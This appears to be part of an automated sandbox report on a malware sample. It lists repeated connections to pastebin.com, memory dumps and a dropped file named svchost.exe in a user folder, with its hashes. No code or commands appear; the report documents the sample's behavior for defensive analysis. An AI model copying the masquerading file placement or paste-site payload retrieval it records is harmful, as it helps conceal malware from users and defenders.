US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp

Files

memory/1932-0-0x00007FFBA4EC3000-0x00007FFBA4EC5000-memory.dmp

memory/1932-1-0x000001715BCE0000-0x000001715BD22000-memory.dmp

memory/4556-7-0x000001F245120000-0x000001F245142000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2got23vd.05h.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4556-12-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

memory/4556-13-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

memory/4556-14-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

memory/4556-17-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

memory/1932-19-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

C:\Users\Admin\Branding\svchost.exe

MD5 ccc910296b7389ba076ffeed54ec400b
SHA1 6dc995e663fd4c84d35ace40733df462f3282340
SHA256 ebf854c44cf0407faa99b0a60ced1b4805c33249cbc0828554cf1aef7b1c1c79
SHA512 45ef0543176424185603492d7c9043f6b28b30611776d04606d4d041f385ab81f4c814d107b8d354baa3c43402be82fe82658fbf7348b9d89a9c0cde1e40b86c

memory/1932-31-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp